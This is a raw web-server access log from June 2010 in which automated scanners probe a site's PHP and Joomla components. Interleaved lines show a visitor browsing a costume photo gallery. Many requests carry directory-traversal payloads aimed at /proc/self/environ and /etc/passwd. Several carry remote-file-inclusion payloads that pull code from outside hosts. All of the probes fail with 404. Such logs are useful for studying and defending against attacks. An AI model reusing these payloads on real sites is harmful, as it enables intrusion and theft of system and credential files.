216.227.215.115 - - [10/Jun/2010:03:53:16 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:03:53:16 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:03:53:41 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
218.48.202.44 - - [10/Jun/2010:03:55:06 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
202.130.32.50 - - [10/Jun/2010:03:56:08 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
202.130.32.50 - - [10/Jun/2010:03:56:08 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.48.202.44 - - [10/Jun/2010:03:56:12 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
218.48.202.44 - - [10/Jun/2010:03:56:13 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
218.48.202.44 - - [10/Jun/2010:03:56:14 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
216.227.215.115 - - [10/Jun/2010:03:56:21 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:03:56:22 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:03:56:22 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:03:56:31 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.832"
202.130.32.50 - - [10/Jun/2010:03:56:57 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.48.202.44 - - [10/Jun/2010:03:57:52 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.48.202.44 - - [10/Jun/2010:03:57:52 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.48.202.44 - - [10/Jun/2010:03:57:53 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
218.48.202.44 - - [10/Jun/2010:03:57:53 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.48.202.44 - - [10/Jun/2010:03:58:17 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
95.72.246.3 - - [10/Jun/2010:03:58:48 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:03:58:49 -0500] "GET /costume/enter1.gif HTTP/1.0" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:03:58:49 -0500] "GET /costume/costm_a.JPG HTTP/1.0" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:03:58:50 -0500] "GET /costume/history5.gif HTTP/1.0" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:03:58:51 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:03:59:16 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
202.130.32.50 - - [10/Jun/2010:03:59:42 -0500] "GET /logs/access_log.1274572800/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
202.130.32.50 - - [10/Jun/2010:03:59:43 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
202.130.32.50 - - [10/Jun/2010:03:59:44 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
202.130.32.50 - - [10/Jun/2010:04:00:09 -0500] "GET /logs/access_log.1274832000/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
95.72.246.3 - - [10/Jun/2010:04:00:13 -0500] "GET /costume/index1.htm HTTP/1.0" 200 21829 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
211.203.180.144 - - [10/Jun/2010:04:00:17 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.203.180.144 - - [10/Jun/2010:04:00:17 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.203.180.144 - - [10/Jun/2010:04:00:17 -0500] "GET /logs/access_log.1271548800//modules/vwar/admin/admin.php?vwar_root=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
72.51.33.26 - - [10/Jun/2010:04:00:31 -0500] "GET /logs/access_log.1273017600/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
72.51.33.26 - - [10/Jun/2010:04:00:31 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
72.51.33.26 - - [10/Jun/2010:04:00:31 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
95.72.246.3 - - [10/Jun/2010:04:00:54 -0500] "GET /costume/thmb1.htm HTTP/1.0" 200 3957 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:04:01:04 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.0" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:04:01:09 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.0" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:04:01:09 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.0" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:04:01:09 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.0" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:04:01:10 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.0" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:04:01:13 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.0" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:04:01:14 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.0" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:04:01:15 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.0" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:04:01:16 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.0" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:04:01:18 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.0" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:04:01:20 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.0" 200 46554 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:04:01:22 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.0" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
202.63.240.21 - - [10/Jun/2010:04:05:07 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
202.63.240.21 - - [10/Jun/2010:04:05:07 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
202.63.240.21 - - [10/Jun/2010:04:06:06 -0500] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.835"
202.63.240.21 - - [10/Jun/2010:04:06:07 -0500] "GET /skins/advanced/advanced1.php?pluginpath[0]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.835"
216.227.215.115 - - [10/Jun/2010:04:07:16 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:04:07:16 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:04:07:16 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
202.130.32.50 - - [10/Jun/2010:04:08:09 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.130.32.50 - - [10/Jun/2010:04:08:10 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.130.32.50 - - [10/Jun/2010:04:08:11 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.63.240.21 - - [10/Jun/2010:04:08:13 -0500] "GET /logs/access_log.1271548800//modules/vwar/admin/admin.php?vwar_root=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
216.227.215.115 - - [10/Jun/2010:04:09:10 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
67.228.235.89 - - [10/Jun/2010:04:10:05 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.817"
67.228.235.89 - - [10/Jun/2010:04:10:05 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.817"
89.200.169.108 - - [10/Jun/2010:04:10:32 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:10:32 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:10:32 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:10:32 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:10:37 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:10:37 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:10:40 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:10:40 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:04:10:41 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:04:10:41 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:04:10:41 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
88.191.94.188 - - [10/Jun/2010:04:10:41 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.227.215.115 - - [10/Jun/2010:04:10:52 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:04:10:52 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
91.203.68.45 - - [10/Jun/2010:04:11:05 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:04:11:05 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
202.130.32.50 - - [10/Jun/2010:04:11:15 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:11:37 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:11:37 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.203.68.45 - - [10/Jun/2010:04:11:45 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:04:11:45 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.200.169.108 - - [10/Jun/2010:04:11:58 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:11:58 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:12:02 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:12:02 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:12:08 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:04:12:08 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.0.234.89 - - [10/Jun/2010:04:13:05 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bigshop.cz/catalog/images/twe.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.4"
67.228.235.89 - - [10/Jun/2010:04:13:13 -0500] "GET /logs/access_log.1274832000//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.817"
67.228.235.89 - - [10/Jun/2010:04:13:13 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.817"
67.228.235.89 - - [10/Jun/2010:04:13:14 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.817"
200.135.228.230 - - [10/Jun/2010:04:14:41 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
79.170.45.162 - - [10/Jun/2010:04:14:44 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:14:44 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
89.31.116.11 - - [10/Jun/2010:04:15:18 -0500] "GET /logs/*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:15:19 -0500] "GET /*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:15:23 -0500] "GET /logs/*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:15:24 -0500] "GET /*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
79.170.45.162 - - [10/Jun/2010:04:15:27 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:15:28 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:15:42 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:15:42 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:17:04 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:04:17:04 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
222.236.47.182 - - [10/Jun/2010:04:17:05 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://antony.freewebhostx.com/data/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [10/Jun/2010:04:17:05 -0500] "GET /logs/access_log.1274572800%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://antony.freewebhostx.com/data/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [10/Jun/2010:04:17:06 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://antony.freewebhostx.com/data/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
89.31.116.11 - - [10/Jun/2010:04:17:18 -0500] "GET /*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:17:21 -0500] "GET /*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:17:22 -0500] "GET /*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:17:23 -0500] "GET /logs/access_log.1274572800/*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:17:25 -0500] "GET /*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:17:25 -0500] "GET /logs/access_log.1274572800/*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:17:26 -0500] "GET /logs/*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:17:26 -0500] "GET /*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:17:27 -0500] "GET /logs/*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:17:46 -0500] "GET /logs/access_log.1274572800/*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:17:47 -0500] "GET /*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:04:17:48 -0500] "GET /logs/*.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
